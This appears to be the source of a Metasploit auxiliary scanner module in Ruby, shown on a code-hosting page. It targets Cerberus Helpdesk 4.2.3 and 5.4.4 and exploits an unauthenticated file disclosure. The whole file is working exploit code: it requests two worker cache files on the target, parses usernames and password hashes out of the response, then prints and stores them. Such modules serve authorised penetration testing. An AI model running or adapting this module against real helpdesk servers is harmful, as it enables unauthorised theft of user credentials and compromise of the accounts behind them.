87 lines
2.8 KiB
Ruby
87 lines
2.8 KiB
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Auxiliary
|
|
include Msf::Exploit::Remote::HttpClient
|
|
include Msf::Auxiliary::Scanner
|
|
include Msf::Auxiliary::Report
|
|
|
|
def initialize
|
|
super(
|
|
'Name' => 'Cerberus Helpdesk User Hash Disclosure',
|
|
'Description' => %q{
|
|
This module extracts usernames and password hashes from the Cerberus Helpdesk
|
|
through an unauthenticated access to a workers file.
|
|
Verified on Version 4.2.3 Stable (Build 925) and 5.4.4
|
|
},
|
|
'References' =>
|
|
[
|
|
[ 'EDB', '39526' ]
|
|
],
|
|
'Author' =>
|
|
[
|
|
'asdizzle_', # discovery
|
|
'h00die', # module
|
|
],
|
|
'License' => MSF_LICENSE,
|
|
'DisclosureDate' => 'Mar 7 2016'
|
|
)
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('TARGETURI', [false, 'URL of the Cerberus Helpdesk root', '/'])
|
|
])
|
|
end
|
|
|
|
def run_host(rhost)
|
|
begin
|
|
['devblocks', 'zend'].each do |site|
|
|
url = normalize_uri(datastore['TARGETURI'], 'storage', 'tmp', "#{site}_cache---ch_workers")
|
|
vprint_status("Attempting to load data from #{url}")
|
|
res = send_request_cgi({'uri' => url})
|
|
if !res
|
|
print_error("#{peer} Unable to connect to #{url}")
|
|
next
|
|
end
|
|
|
|
if !res.body.include?('pass')
|
|
print_error("Invalid response received for #{peer} for #{url}")
|
|
next
|
|
end
|
|
|
|
cred_table = Rex::Text::Table.new 'Header' => 'Cerberus Helpdesk User Credentials',
|
|
'Indent' => 1,
|
|
'Columns' => ['Username', 'Password Hash']
|
|
|
|
# the returned object looks json-ish, but it isn't. Unsure of format, so we'll do some ugly manual parsing.
|
|
# this will be a rough equivalent to sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g'
|
|
result = res.body.split('s:5')
|
|
result.each do |cred|
|
|
if cred.include?('email')
|
|
cred = cred.split(':')
|
|
username = cred[3].tr('";', '') # remove extra characters
|
|
username = username[0...-1] # also remove trailing s
|
|
password_hash = cred[7].tr('";', '') # remove extra characters
|
|
print_good("Found: #{username}:#{password_hash}")
|
|
store_valid_credential(
|
|
user: username,
|
|
private: password_hash,
|
|
private_type: :nonreplayable_hash
|
|
)
|
|
cred_table << [username, password_hash]
|
|
end
|
|
end
|
|
print_line
|
|
print_line cred_table.to_s
|
|
break
|
|
end
|
|
|
|
rescue ::Rex::ConnectionError
|
|
print_error("#{peer} Unable to connect to site")
|
|
return
|
|
end
|
|
end
|
|
end
|